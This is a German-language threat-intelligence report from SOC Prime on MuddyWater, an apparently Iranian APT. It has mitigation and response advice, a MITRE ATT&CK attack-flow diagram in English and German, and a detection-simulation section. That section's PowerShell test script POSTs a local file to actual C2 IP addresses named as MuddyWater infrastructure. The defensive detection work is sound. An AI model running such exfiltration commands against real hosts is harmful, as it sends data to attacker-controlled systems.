MuddyWater aufgedeckt: Einblick in eine iranische APT-Operation

Ruslan Mikhalov Leiter der Bedrohungsforschung bei SOC Prime

Folgen

MuddyWater aufgedeckt: Einblick in eine iranische APT-Operation

Detection stack

AIDR
Alert
ETL
Query

Bedrohungsbericht
Angriffsablauf
Erkennungen
Simulationen

Zusammenfassung

Forscher identifizierten eine MuddyWater (Static Kitten) Einbruchsgruppe, die mehrere maßgeschneiderte C2-Frameworks mit opportunistischer Ausnutzung zahlreicher öffentlich zugänglicher Schwachstellen und hochvolumigem Anmeldeinformations-Spraying kombinierte. Die Betreiber koppelten Aufklärung, Erstzugriff und Datendiebstahls-Tools, um Ziele im Nahen Osten, Europa und den Vereinigten Staaten zu kompromittieren.

Untersuchung

Ermittler beschlagnahmten freigelegte Infrastruktur von einem in den Niederlanden gehosteten VPS und extrahierten Binärdateien von drei speziell entwickelten C2-Servern: KeyC2, PersianC2, und ArenaC2. Sie stellten auch unterstützende Werkzeuge wieder her, darunter PowerShell-basierte Loader und Node.js-Payloads, die für die Vorbereitung und Ausführung verwendet wurden. Die Aktivität umfasste großangelegte Scans nach öffentlich zugänglichen Schwachstellen, gefolgt von Ausnutzung, und integrierte Blockchain-Smart-Contracts als Mechanismus zur dynamischen Auflösung oder Aktualisierung von C2-Endpunkten.

Minderung

Priorisieren Sie die Behebung der genannten CVEs und reduzieren Sie die Angriffsfläche, indem Sie öffentliche Dienste sicherer machen und ihre Exposition einschränken. Blockieren oder beschränken Sie unbekannten ausgehenden UDP-Verkehr auf Port 1269 und überwachen Sie Ausführungsartefakte, die mit den benutzerdefinierten C2-Binärdateien und ihren charakteristischen Befehlsmustern in Verbindung stehen. Erzwingen Sie das Prinzip der geringsten Privilegien für VPN- und Administratorkonten auf Netzwerkgeräten und erhöhen Sie die Erkennungsabdeckung für anomales PowerShell-Verhalten und verschlüsselte ausgehende Sitzungen zu unbekannten IP-Bereichen.

Antwort

Wenn Indikatoren beobachtet werden, isolieren Sie die betroffenen Systeme, bewahren Sie Speicher- und Datenträgerartefakte und blockieren Sie sofort die identifizierten C2-Domains/IPs. Führen Sie eine forensische Untersuchung der wiederhergestellten Loader und Node.js-Skripte durch, um Umfang und Persistenz der Ausführung zu bestimmen. Patchen Sie alle ausgenutzten Schwachstellen und ändern Sie alle Anmeldeinformationen, die durch Spraying oder Diebstahl offengelegt worden sein könnten.

<div class="wp-block-socprime-category-attack-flow attack-flow-class" data-title="Attack Flow" data-attack-flow="graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef malware fill:#ccffcc classDef c2 fill:#ffccff %% Step 1 – Active Scanning: Vulnerability Scanning step1["Action – T1595.002 Active Scanning: Vulnerability Scanning Tool: Nuclei Description: Mass‑scan public services for exploitable CVEs such as FortiOS CVE‑2024‑55591 and Ivanti CVE‑2026‑1281."] class step1 action tool_nuclei["Tool – Name: Nuclei Description: High‑speed vulnerability scanner used for large‑scale internet probing."] class tool_nuclei tool step1 –>|uses| tool_nuclei step1 –>|leads_to| step2 %% Step 2 – Gather Victim Network Information: DNS step2["Action – T1590.002 Gather Victim Network Information: DNS Tools: subfinder, Sudomy, OneForAll Description: Enumerate subdomains and DNS records for targets such as clearview.ai and jewishagency.org."] class step2 action tool_subfinder["Tool – Name: subfinder Description: Fast passive subdomain discovery tool."] class tool_subfinder tool step2 –>|uses| tool_subfinder step2 –>|leads_to| step3 %% Step 3 – Active Scanning: Wordlist Scanning step3["Action – T1595.003 Active Scanning: Wordlist Scanning Tool: ffuf Description: Brute‑force web directories with a medium‑size wordlist to discover hidden resources."] class step3 action tool_ffuf["Tool – Name: ffuf Description: Fast web‑fuzzer for directory and file discovery."] class tool_ffuf tool step3 –>|uses| tool_ffuf step3 –>|leads_to| step4 %% Step 4 – Search Open Technical Databases: Scan Databases step4["Action – T1596.005 Search Open Technical Databases: Scan Databases Tool: Shodan CLI Description: Query Shodan for vulnerable Ivanti devices using service signatures and favicon hashes."] class step4 action tool_shodan["Tool – Name: Shodan CLI Description: Command‑line interface to the Shodan internet‑exposure search engine."] class tool_shodan tool step4 –>|uses| tool_shodan step4 –>|leads_to| step5 %% Step 5 – Brute Force: Password Spraying step5["Action – T1110.003 Brute Force: Password Spraying Tool: Python owa.py script Description: Spray common passwords against Outlook Web Access and SMTP services of Israeli, Jordanian and UAE organisations."] class step5 action tool_owa["Tool – Name: owa.py Description: Python script that performs password‑spraying attacks against OWA endpoints."] class tool_owa tool step5 –>|uses| tool_owa step5 –>|leads_to| step6 %% Step 6 – Brute Force: Password Guessing step6["Action – T1110.001 Brute Force: Password Guessing Tool: Patator Description: Attempt SMTP logins with credential lists to obtain valid accounts."] class step6 action tool_patator["Tool – Name: Patator Description: Multi‑protocol brute‑forcing tool supporting SMTP, SSH, HTTP, etc."] class tool_patator tool step6 –>|uses| tool_patator step6 –>|leads_to| step7 %% Step 7 – Exploit Public‑Facing Application step7["Action – T1190 Exploit Public‑Facing Application Technique: Novel SQL injection flaws in BaSalam and a Postgres development platform. Description: Exploit crafted SQLi payloads to obtain initial foothold on web servers."] class step7 action step7 –>|leads_to| step8 %% Step 8 – Exploitation of Remote Services step8["Action – T1210 Exploitation of Remote Services Tool: Neo‑reGeorg ASPX web‑shell Description: Upload web‑shell to compromised Exchange server for persistence and remote command execution."] class step8 action malware_neoregeorg["Malware – Name: Neo‑reGeorg ASPX web‑shell Description: ASPX web‑shell providing remote command execution and tunneling capabilities."] class malware_neoregeorg malware step8 –>|uploads| malware_neoregeorg step8 –>|leads_to| step9 %% Step 9 – Boot or Logon Autostart Execution: Registry Run Keys step9["Action – T1547.001 Boot or Logon Autostart Execution: Registry Run Keys Malware: Node.js payload VfZUSQi6oerKau.js Description: Create HKCU\Software\Microsoft\Windows\CurrentVersion\Run key for persistence."] class step9 action malware_nodejs["Malware – Name: VfZUSQi6oerKau.js Description: Obfuscated Node.js payload that writes a Run‑key for persistence."] class malware_nodejs malware step9 –>|creates| malware_nodejs step9 –>|leads_to| step10 %% Step 10 – Server Software Component: Web Shell step10["Action – T1505.003 Server Software Component: Web Shell Component: Neo‑reGeorg web‑shell (nfud.aspx) Description: Enables remote command execution on compromised server."] class step10 action malware_nfud["Malware – Name: nfud.aspx Description: ASPX web‑shell variant used for persistent access."] class malware_nfud malware step10 –>|implements| malware_nfud step10 –>|leads_to| step11 %% Step 11 – Create Account: Local Account step11["Action – T1136.001 Create Account: Local Account Result: Privileged admin account "FortiSetup" with super_admin profile. Description: Modified FortiGate exploit scripts to add a persistent local admin account."] class step11 action step11 –>|leads_to| step12 %% Step 12 – Obfuscated Files or Information step12["Action – T1027 Obfuscated Files or Information Malware: Node.js payloads Description: Payloads heavily obfuscated and AES‑CBC encrypted before being written to disk."] class step12 action malware_obf["Malware – Name: Encrypted Node.js payloads Description: AES‑CBC encrypted blobs stored on the victim file system."] class malware_obf malware step12 –>|produces| malware_obf step12 –>|leads_to| step13 %% Step 13 – Deobfuscate/Decode Files or Information step13["Action – T1140 Deobfuscate/Decode Files or Information Tool: PowerShell loader reset.ps1 Description: Decrypts AES‑CBC encrypted blobs at runtime."] class step13 action tool_psloader["Tool – Name: reset.ps1 Description: PowerShell script that decrypts and loads malicious payloads in memory."] class tool_psloader tool step13 –>|uses| tool_psloader step13 –>|leads_to| step14 %% Step 14 – Reflective Code Loading step14["Action – T1620 Reflective Code Loading Technique: PowerShell loader loads decrypted Node.js components reflectively in memory."] class step14 action step14 –>|leads_to| step15 %% Step 15 – Application Layer Protocol: Web Protocols step15["Action – T1071.001 Application Layer Protocol: Web Protocols C2: PersianC2 Description: HTTP polling using JSON API endpoints to retrieve commands."] class step15 action c2_persian["C2 – Name: PersianC2 Description: HTTP‑based command and control using JSON polling."] class c2_persian c2 step15 –>|communicates_via| c2_persian step15 –>|leads_to| step16 %% Step 16 – Non‑Application Layer Protocol step16["Action – T1095 Non‑Application Layer Protocol C2: KeyC2 Description: Custom binary protocol over UDP port 1269 for beaconing and command execution."] class step16 action c2_key["C2 – Name: KeyC2 Description: UDP‑based covert channel using proprietary binary format."] class c2_key c2 step16 –>|communicates_via| c2_key step16 –>|leads_to| step17 %% Step 17 – Web Service: Dead Drop Resolver step17["Action – T1102.001 Web Service: Dead Drop Resolver Technique: Query Ethereum smart contracts to resolve C2 server IP addresses dynamically."] class step17 action step17 –>|leads_to| step18 %% Step 18 – Web Service: Bidirectional Communication step18["Action – T1102.002 Web Service: Bidirectional Communication C2: ArenaC2 (FastAPI/uvicorn) Description: HTTP POST interface encrypting traffic with AES‑256‑CBC."] class step18 action c2_arena["C2 – Name: ArenaC2 Description: FastAPI server providing encrypted bidirectional C2 channel."] class c2_arena c2 step18 –>|uses| c2_arena step18 –>|leads_to| step19 %% Step 19 – Web Service: One‑Way Communication step19["Action – T1102.003 Web Service: One‑Way Communication Component: Minimal Flask server (web.py) on port 10443 accepting file uploads for exfiltration."] class step19 action malware_flask["Malware – Name: web.py Description: Simple Flask app acting as a dead‑drop for stolen data."] class malware_flask malware step19 –>|implements| malware_flask step19 –>|leads_to| step20 %% Step 20 – Protocol Tunneling step20["Action – T1572 Protocol Tunneling Tool: Neo‑reGeorg acting as SOCKS proxy (resocks, revsocks) to tunnel into internal networks."] class step20 action step20 –>|leads_to| step21 %% Step 21 – Proxy: External Proxy step21["Action – T1090.002 Proxy: External Proxy Listeners: resocks and revsocks creating external SOCKS proxies for lateral movement."] class step21 action step21 –>|leads_to| step22 %% Step 22 – Encrypted Channel: Symmetric Cryptography step22["Action – T1573.001 Encrypted Channel: Symmetric Cryptography Technique: ArenaC2 encrypts all C2 traffic with AES‑256‑CBC using a hard‑coded key."] class step22 action step22 –>|leads_to| step23 %% Step 23 – Dynamic Resolution step23["Action – T1568 Dynamic Resolution Method: Smart‑contract calls (getString) on Ethereum return active C2 IP list (e.g., 185.236.25.119)."] class step23 action step23 –>|leads_to| step24 %% Step 24 – Exfiltration to Cloud Storage step24["Action – T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage Tool: rclone Destination: Wasabi S3, put.io Description: Upload stolen files to cloud storage accounts."] class step24 action tool_rclone["Tool – Name: rclone Description: Command‑line program for syncing files to cloud storage services."] class tool_rclone tool step24 –>|uses| tool_rclone step24 –>|leads_to| step25 %% Step 25 – Exfiltration Over C2 Channel step25["Action – T1041 Exfiltration Over C2 Channel Capability: KeyC2 and PersianC2 support file download commands to retrieve data from victims."] class step25 action step25 –>|leads_to| step26 %% Step 26 – Exfiltration Over Alternative Protocol step26["Action – T1048 Exfiltration Over Alternative Protocol

graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef malware fill:#ccffcc classDef c2 fill:#ffccff %% Step 1 – Active Scanning: Vulnerability Scanning step1[„Aktion – T1595.002 Aktives Scannen: Schwachstellensuche Werkzeug: Nuclei Beschreibung: Massen-Scan öffentlicher Dienste nach ausnutzbaren CVEs wie FortiOS CVE‑2024‑55591 und Ivanti CVE‑2026‑1281.“] class step1 action tool_nuclei[„Werkzeug – Name: Nuclei Beschreibung: Hochgeschwindigkeits-Scanner für Schwachstellen, der für großangelegtes Internet-Probing verwendet wird.“] class tool_nuclei tool step1 –>|uses| tool_nuclei step1 –>|leads_to| step2 %% Step 2 – Gather Victim Network Information: DNS step2[„Aktion – T1590.002 Sammeln von Opfer-Netzwerkinformationen: DNS Werkzeuge: subfinder, Sudomy, OneForAll Beschreibung: Auflisten von Subdomains und DNS-Einträgen für Ziele wie clearview.ai und jewishagency.org.“] class step2 action tool_subfinder[„Werkzeug – Name: subfinder Beschreibung: Schnelles Werkzeug zur passiven Entdeckung von Subdomains.“] class tool_subfinder tool step2 –>|uses| tool_subfinder step2 –>|leads_to| step3 %% Step 3 – Active Scanning: Wordlist Scanning step3[„Aktion – T1595.003 Aktives Scannen: Wortlistenscan Werkzeug: ffuf Beschreibung: Bruteforce von Webverzeichnissen mit einer mittelgroßen Wortliste, um versteckte Ressourcen zu entdecken.“] class step3 action tool_ffuf[„Werkzeug – Name: ffuf Beschreibung: Schnellweb-Fuzzer zur Entdeckung von Verzeichnissen und Dateien.“] class tool_ffuf tool step3 –>|uses| tool_ffuf step3 –>|leads_to| step4 %% Step 4 – Search Open Technical Databases: Scan Databases step4[„Aktion – T1596.005 Durchsuchen von offenen technischen Datenbanken: Scannen von Datenbanken Werkzeug: Shodan CLI Beschreibung: Abfrage von Shodan nach anfälligen Ivanti-Geräten unter Verwendung von Dienstsignaturen und Favicon-Hashes.“] class step4 action tool_shodan[„Werkzeug – Name: Shodan CLI Beschreibung: Kommandozeilen-Schnittstelle zur Suchmaschine für Internet-Exposition Shodan.“] class tool_shodan tool step4 –>|uses| tool_shodan step4 –>|leads_to| step5 %% Step 5 – Brute Force: Password Spraying step5[„Aktion – T1110.003 Brute Force: Password Spraying Werkzeug: Python owa.py Skript Beschreibung: Sprühen von gängigen Passwörtern gegen Outlook Web Access und SMTP-Dienste von Organisationen in Israel, Jordanien und den VAE.“] class step5 action tool_owa[„Werkzeug – Name: owa.py Beschreibung: Python-Skript, das Passwort-Spraying-Angriffe gegen OWA-Endpunkte ausführt.“] class tool_owa tool step5 –>|uses| tool_owa step5 –>|leads_to| step6 %% Step 6 – Brute Force: Password Guessing step6[„Aktion – T1110.001 Brute Force: Password Guessing Werkzeug: Patator Beschreibung: Versuch, SMTP-Anmeldungen mit Anmeldeinformationslisten durchzuführen, um gültige Konten zu erhalten.“] class step6 action tool_patator[„Werkzeug – Name: Patator Beschreibung: Multiprotokoll-Bruteforcing-Tool, das SMTP, SSH, HTTP usw. unterstützt.“] class tool_patator tool step6 –>|uses| tool_patator step6 –>|leads_to| step7 %% Step 7 – Exploiting Public‑Facing Applications step7[„Aktion – T1190 Nutzung öffentlicher Anwendungen Technik: Neuartige SQL-Injektionsschwachstellen in BaSalam und einer Postgres-Entwicklungsplattform. Beschreibung: Ausnutzen von ausgearbeiteten SQLi-Payloads, um ersten Zugriff auf Webserver zu erhalten.“] class step7 action step7 –>|leads_to| step8 %% Step 8 – Exploitation of Remote Services step8[„Aktion – T1210 Ausnutzung von Remote-Diensten Tool: Neo‑reGeorg ASPX Webshell Beschreibung: Hochladen einer Webshell auf einen kompromittierten Exchange-Server für Persistenz und Fernbefehlausführung.“] class step8 action malware_neoregeorg[„Malware – Name: Neo‑reGeorg ASPX Webshell Beschreibung: ASPX Webshell, die Fernbefehlausführung und Tunnelkapazitäten bietet.“] class malware_neoregeorg malware step8 –>|uploads| malware_neoregeorg step8 –>|leads_to| step9 %% Step 9 – Boot or Logon Autostart Execution: Registry Run Keys step9[„Aktion – T1547.001 Autostart-Ausführung beim Booten oder Anmelden: Registrierungslaufschlüssel Malware: Node.js-Payload VfZUSQi6oerKau.js Beschreibung: Erstellen eines HKCU\Software\Microsoft\Windows\CurrentVersion\Run-Schlüssels für Persistenz.“] class step9 action malware_nodejs[„Malware – Name: VfZUSQi6oerKau.js Beschreibung: Verschleiertes Node.js-Payload, das einen Run-Schlüssel für Persistenz schreibt.“] class malware_nodejs malware step9 –>|creates| malware_nodejs step9 –>|leads_to| step10 %% Step 10 – Server Software Component: Web Shell step10[„Aktion – T1505.003 Server-Software-Komponente: Webshell Komponente: Neo‑reGeorg Webshell (nfud.aspx) Beschreibung: Ermöglicht die Fernbefehlsausführung auf einem kompromittierten Server.“] class step10 action malware_nfud[„Malware – Name: nfud.aspx Beschreibung: ASPX Webshell-Variante, die für den dauerhaften Zugriff verwendet wird.“] class malware_nfud malware step10 –>|implements| malware_nfud step10 –>|leads_to| step11 %% Step 11 – Create Account: Local Account step11[„Aktion – T1136.001 Konto erstellen: Lokales Konto Ergebnis: privilegiertes Administratorkonto „FortiSetup“ mit Superadmin-Profil. Beschreibung: Geänderte FortiGate-Exploit-Skripte, um ein dauerhaftes lokales Administratorkonto hinzuzufügen.“] class step11 action step11 –>|leads_to| step12 %% Step 12 – Obfuscated Files or Information step12[„Aktion – T1027 Verschleierte Dateien oder Informationen Malware: Node.js Payloads Beschreibung: Payloads sind stark verschleiert und mit AES-CBC verschlüsselt, bevor sie auf die Festplatte geschrieben werden.“] class step12 action malware_obf[„Malware – Name: Verschlüsselte Node.js-Payloads Beschreibung: AES-CBC verschlüsselte Blobs, die auf dem Dateisystem des Opfers gespeichert sind.“] class malware_obf malware step12 –>|produces| malware_obf step12 –>|leads_to| step13 %% Step 13 – Deobfuscate/Decode Files or Information step13[„Aktion – T1140 Deobfuskieren/Entschlüsseln von Dateien oder Informationen Werkzeug: PowerShell-Loader reset.ps1 Beschreibung: Entschlüsselt zur Laufzeit AES-CBC-verschlüsselte Blobs.“] class step13 action tool_psloader[„Werkzeug – Name: reset.ps1 Beschreibung: PowerShell-Skript, das bösartige Payloads im Speicher entschlüsselt und lädt.“] class tool_psloader tool step13 –>|uses| tool_psloader step13 –>|leads_to| step14 %% Step 14 – Reflective Code Loading step14[„Aktion – T1620 Spiegelndes Code-Laden Technik: PowerShell-Loader lädt entschlüsselte Node.js-Komponenten spiegelbildlich im Speicher.“] class step14 action step14 –>|leads_to| step15 %% Step 15 – Application Layer Protocol: Web Protocols step15[„Aktion – T1071.001 Anwendungsschichtprotokoll: Webprotokolle C2: PersianC2 Beschreibung: HTTP-Polling unter Verwendung von JSON-API-Endpunkten zur Abrufung von Befehlen.“] class step15 action c2_persian[„C2 – Name: PersianC2 Beschreibung: HTTP-basiertes Kommando- und Kontrollsystem unter Verwendung von JSON-Polling.“] class c2_persian c2 step15 –>|communicates_via| c2_persian step15 –>|leads_to| step16 %% Step 16 – Non‑Application Layer Protocol step16[„Aktion – T1095 Nicht-Anwendungsschichtprotokoll C2: KeyC2 Beschreibung: Benutzerdefiniertes Binärprotokoll über UDP-Port 1269 für Beaconing und Befehlsausführung.“] class step16 action c2_key[„C2 – Name: KeyC2 Beschreibung: UDP-basiertes verdecktes Kanalprotokoll im proprietären Binärformat.“] class c2_key c2 step16 –>|communicates_via| c2_key step16 –>|leads_to| step17 %% Step 17 – Web Service: Dead Drop Resolver step17[„Aktion – T1102.001 Webdienst: Dead Drop Resolver Technik: Abfrage von Ethereum Smart Contracts zur dynamischen Auflösung von C2-Server-IP-Adressen.“] class step17 action step17 –>|leads_to| step18 %% Step 18 – Web Service: Bidirectional Communication step18[„Aktion – T1102.002 Webdienst: Bidirektionale Kommunikation C2: ArenaC2 (FastAPI/uvicorn) Beschreibung: HTTP-POST-Schnittstelle, die den Verkehr mit AES-256-CBC verschlüsselt.“] class step18 action c2_arena[„C2 – Name: ArenaC2 Beschreibung: FastAPI-Server, der verschlüsselten bidirektionalen C2-Kanal bereitstellt.“] class c2_arena c2 step18 –>|uses| c2_arena step18 –>|leads_to| step19 %% Step 19 – Web Service: One‑Way Communication step19[„Aktion – T1102.003 Webdienst: Einwegkommunikation Komponente: Minimaler Flask-Server (web.py) auf Port 10443, der Dateiuploads zur Exfiltration akzeptiert.“] class step19 action malware_flask[„Malware – Name: web.py Beschreibung: Einfaches Flask-App, das als Dead-Drop für gestohlene Daten fungiert.“] class malware_flask malware step19 –>|implements| malware_flask step19 –>|leads_to| step20 %% Step 20 – Protocol Tunneling step20[„Aktion – T1572 Protokoll-Tunneling Werkzeug: Neo‑reGeorg fungiert als SOCKS-Proxy (resocks, revsocks) zum Tunneling in interne Netzwerke.“] class step20 action step20 –>|leads_to| step21 %% Step 21 – Proxy: External Proxy step21[„Aktion – T1090.002 Proxy: Externer Proxy Listeners: resocks und revsocks erstellen externe SOCKS-Proxys für Seitwärtsbewegung.“] class step21 action step21 –>|leads_to| step22 %% Step 22 – Encrypted Channel: Symmetric Cryptography step22[„Aktion – T1573.001 Verschlüsselter Kanal: Symmetrische Kryptografie Technik: ArenaC2 verschlüsselt den gesamten C2-Verkehr mit AES-256-CBC unter Verwendung eines fest codierten Schlüssels.“] class step22 action step22 –>|leads_to| step23 %% Step 23 – Dynamic Resolution step23[„Aktion – T1568 Dynamische Auflösung Methode: Smart-Contract-Anrufe (getString) auf Ethereum geben eine aktive C2-IP-Liste zurück (z.B., 185.236.25.119).“] class step23 action step23 –>|leads_to| step24 %% Step 24 –Exfiltration to Cloud Storage step24[„Aktion – T1567.002 Exfiltration über Webdienst: Exfiltration in Cloud-Speicher Werkzeug: rclone Ziel: Wasabi S3, put.io Beschreibung: Hochladen gestohlener Dateien in Cloud-Speicherkonten.“] class step24 action tool_rclone[„Werkzeug – Name: rclone Beschreibung: Kommandozeilen-Programm zum Synchronisieren von Dateien mit Cloud-Speicherdiensten.“] class tool_rclone tool step24 –>|uses| tool_rclone step24 –>|leads_to| step25 %% Step 25 – Exfiltration Over C2 Channel step25[„Aktion – T1041 Datenexfiltration über C2-Kanal Fähigkeit: KeyC2 und PersianC2 unterstützen Dateidownloads, um Daten von Opfern abzurufen.“] class step25 action step25 –>|leads_to| step26 %% Step 26 – Exfiltration Over Alternative Protocol step26[„Aktion – T1048 Datenexfiltration über alternatives Protokoll Methode: Flask-HTTP-Server und EC2-Instanz (18.223.24.218) werden verwendet, um große Datenmengen aus der Opferumgebung herauszuschieben.“] class step26 action

Angriffsfluss

Anzeigen

Ausführung der Simulation

Voraussetzung: Das Telemetrie- & Baseline-Pre-Flight-Check muss bestanden werden.

Rationale: Dieser Abschnitt beschreibt die präzise Ausführung der gegnerischen Technik (TTP), die entwickelt wurde, um die Erkennungsregel auszulösen. Die Befehle und das Narrativ müssen direkt die identifizierten TTPs widerspiegeln und darauf abzielen, die genaue Telemetrie zu erzeugen, die von der Erkennungslogik erwartet wird.

Angriffs-Narrativ & Befehle:
1. Aufklärung & Datenvorbereitung: Der Angreifer listet lokale Dateien auf (T1005) und schreibt eine kleine Nutzlast (secret.txt) auf den Arbeitsplatz.
2. Einrichtung der C2-Kommunikation: Mit PowerShell (T1059.001), erstellt der Angreifer einen HTTPS-POST zur MuddyWater C2-Server 194.11.246.101 auf Port 443 unter Einbettung der vorbereiteten Daten.
3. Alternativer Kanal (Nicht-Standard-Port): Um einfache Port-basierte Regeln zu umgehen, wiederholt der Angreifer die Exfiltration über Port 1338 unter Verwendung Invoke-WebRequest mit dem -Port -Schalter (PowerShell 7+).
4. Optionales Proxy-Chaining: Die Anfrage wird über einen externen Proxy geleitet (T1090.002), aber die endgültige Ziel-IP bleibt der MuddyWater-Host, um sicherzustellen, dass die Firewall-Protokolle die bösartige dst_ip.

Regressionstest-Skript:

# MuddyWater-Exfiltrationssimulation – PowerShell
# ------------------------------------------------
# Schritt 1: Erstellen von Dummy-Daten
$dataPath = "$env:TEMPsecret.txt"
"Sensitive data $(Get-Date)" | Out-File -FilePath $dataPath -Encoding UTF8

# Schritt 2: Definieren der C2-Endpunkte
$c2Ips = @('194.11.246.101','18.223.24.218')
$c2Ports = @(443,1338)

# Schritt 3: Upload via HTTPS (Port 443)
foreach ($ip in $c2Ips) {
    $uri = "https://$ip/upload"
    Invoke-WebRequest -Uri $uri -Method POST -InFile $dataPath -UseBasicParsing -ErrorAction SilentlyContinue
}

# Schritt 4: Upload via benutzerdefiniertem Port 1338 (erfordert PowerShell 7+)
foreach ($ip in $c2Ips) {
    $uri = "http://$ip:1338/upload"
    Invoke-WebRequest -Uri $uri -Method POST -InFile $dataPath -UseBasicParsing -ErrorAction SilentlyContinue
}

# Schritt 5: Aufräumen
Remove-Item -Path $dataPath -Force

Aufräumbefehle:

# Entfernen von verbleibenden Netzwerkverbindungen (Windows)
Get-NetTCPConnection -RemoteAddress 194.11.246.101,18.223.24.218 |
    Where-Object { $_.State -eq 'Established' } |
    ForEach-Object { Stop-Process -Id $_.OwningProcess -Force }

# Löschen temporärer Dateien (bei Bedarf erneut ausführen)
$tempFile = "$env:TEMPsecret.txt"
if (Test-Path $tempFile) { Remove-Item $tempFile -Force }

Treten Sie der Detection as Code-Plattform von SOC Prime bei um die Sichtbarkeit der für Ihr Unternehmen relevantesten Bedrohungen zu verbessern. Um Ihnen den Einstieg zu erleichtern und unmittelbaren Mehrwert zu erzielen, buchen Sie jetzt ein Treffen mit den Experten von SOC Prime.

Kostenlos beitreten